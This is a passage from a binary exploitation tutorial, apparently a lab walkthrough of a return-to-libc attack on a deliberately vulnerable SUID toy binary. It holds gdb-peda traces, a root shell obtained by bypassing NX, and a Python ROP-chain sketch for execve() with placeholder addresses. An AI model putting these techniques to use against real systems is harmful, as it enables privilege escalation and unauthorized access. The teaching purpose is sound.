0040| 0x7fffffffe538 --> 0x7fffffffe608 --> 0x7fffffffe827 ("/home/koji/ret2libc/ret2libc")
0048| 0x7fffffffe540 --> 0x100000000
0056| 0x7fffffffe548 --> 0x400610 (<main>:  push   rbp)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x00000000004006a3 in __libc_csu_init ()

Step in and RDI should now contain a pointer to “/bin/sh”:

gdb-peda$ si
[----------------------------------registers-----------------------------------]
.
.
.
RDI: 0x4006ff --> 0x68732f6e69622f ('/bin/sh')
.
.
.
[-------------------------------------code-------------------------------------]
   0x40069e <__libc_csu_init+94>:   pop    r13
   0x4006a0 <__libc_csu_init+96>:   pop    r14
   0x4006a2 <__libc_csu_init+98>:   pop    r15
=> 0x4006a4 <__libc_csu_init+100>:  ret
   0x4006a5:    data32 nop WORD PTR cs:[rax+rax*1+0x0]
   0x4006b0 <__libc_csu_fini>:  repz ret
   0x4006b2:    add    BYTE PTR [rax],al
   0x4006b4 <_fini>:    sub    rsp,0x8
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffe518 --> 0x7ffff7a5ac40 (<system>:  test   rdi,rdi)
0008| 0x7fffffffe520 --> 0x0
0016| 0x7fffffffe528 --> 0x7ffff7a37ec5 (<__libc_start_main+245>:   mov    edi,eax)
0024| 0x7fffffffe530 --> 0x0
0032| 0x7fffffffe538 --> 0x7fffffffe608 --> 0x7fffffffe827 ("/home/koji/ret2libc/ret2libc")
0040| 0x7fffffffe540 --> 0x100000000
0048| 0x7fffffffe548 --> 0x400610 (<main>:  push   rbp)
0056| 0x7fffffffe550 --> 0x0
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x00000000004006a4 in __libc_csu_init ()

Now RIP points to ret and RSP points to the address of system(). Step in again and we should now be in system():

gdb-peda$ si
.
.
.
[-------------------------------------code-------------------------------------]
   0x7ffff7a5ac35 <cancel_handler+181>: pop    rbx
   0x7ffff7a5ac36 <cancel_handler+182>: ret
   0x7ffff7a5ac37:  nop    WORD PTR [rax+rax*1+0x0]
=> 0x7ffff7a5ac40 <system>: test   rdi,rdi
   0x7ffff7a5ac43 <system+3>:   je     0x7ffff7a5ac50 <system+16>
   0x7ffff7a5ac45 <system+5>:   jmp    0x7ffff7a5a770 <do_system>
   0x7ffff7a5ac4a <system+10>:  nop    WORD PTR [rax+rax*1+0x0]
   0x7ffff7a5ac50 <system+16>:  lea    rdi,[rip+0x13744c]        # 0x7ffff7b920a3

At this point, if we just continue execution, we should see that "/bin/sh" is executed:

gdb-peda$ c
[New process 11114]
process 11114 is executing new program: /bin/dash
Error in re-setting breakpoint 1: No symbol table is loaded.  Use the "file" command.
Error in re-setting breakpoint 1: No symbol "vuln" in current context.
Error in re-setting breakpoint 1: No symbol "vuln" in current context.
Error in re-setting breakpoint 1: No symbol "vuln" in current context.
[New process 11115]
Error in re-setting breakpoint 1: No symbol "vuln" in current context.
process 11115 is executing new program: /bin/dash
Error in re-setting breakpoint 1: No symbol table is loaded.  Use the "file" command.
Error in re-setting breakpoint 1: No symbol "vuln" in current context.
Error in re-setting breakpoint 1: No symbol "vuln" in current context.
Error in re-setting breakpoint 1: No symbol "vuln" in current context.
[Inferior 3 (process 11115) exited normally]
Warning: not running or target is remote

Perfect, it looks like our exploit works. Let’s try it and see if we can get a root shell. We’ll change ret2libc’s owner and permissions so that it’s SUID root:

koji@pwnbox:~/ret2libc$ sudo chown root ret2libc
koji@pwnbox:~/ret2libc$ sudo chmod 4755 ret2libc

Now let’s execute our exploit much like we did in part 1. The trailing cat keeps stdin open, so once the payload has been delivered we can keep typing commands into the spawned shell:

koji@pwnbox:~/ret2libc$ (cat in.txt ; cat) | ./ret2libc
Try to exec /bin/sh
Read 128 bytes. buf is AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA�
No shell for you :(
whoami
root

Got our root shell again, and we bypassed NX. Now this was a relatively simple exploit that only required one parameter. What if we need more? Then we need to find more gadgets that set up the registers accordingly before returning to a function in libc. If you’re up for a challenge, rewrite the exploit so that it calls execve() instead of system(). execve() requires three parameters:

int execve(const char *filename, char *const argv[], char *const envp[]);

This means you’ll need to have RDI, RSI, and RDX populated with proper values before calling execve(). Try to use gadgets only within the binary itself; that is, don’t look for gadgets in libc.
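As a starting point, here’s a rough sketch of what such a chain could look like. Every address marked “hypothetical” below is a placeholder I made up for illustration; you’ll have to find the real gadget addresses with ropper and the libc address of execve() with gdb on your own system:

#!/usr/bin/env python

from struct import pack

POP_RDI_RET     = 0x00000000004006a3    # pop rdi; ret (found earlier)
POP_RSI_R15_RET = 0x4141414141414141    # hypothetical: pop rsi; pop r15; ret
POP_RDX_RET     = 0x4242424242424242    # hypothetical: pop rdx; ret
BINSH           = 0x00000000004006ff    # pointer to "/bin/sh" in the binary
EXECVE          = 0x4343434343434343    # hypothetical: address of execve() in libc

buf  = "A"*104                          # junk up to the saved return address
buf += pack("<Q", POP_RDI_RET)
buf += pack("<Q", BINSH)                # RDI = filename = "/bin/sh"
buf += pack("<Q", POP_RSI_R15_RET)
buf += pack("<Q", 0)                    # RSI = argv = NULL
buf += pack("<Q", 0)                    # filler eaten by the extra pop r15
buf += pack("<Q", POP_RDX_RET)
buf += pack("<Q", 0)                    # RDX = envp = NULL
buf += pack("<Q", EXECVE)               # return into execve("/bin/sh", NULL, NULL)

f = open("in.txt", "w")
f.write(buf)
f.close()

Linux happens to accept NULL for both argv and envp, which keeps the chain short. Gadgets of the pop rsi; pop r15; ret shape can often be carved out of __libc_csu_init’s epilogue, just like our pop rdi; ret was, while a clean pop rdx; ret is usually the hardest piece to find in a small binary.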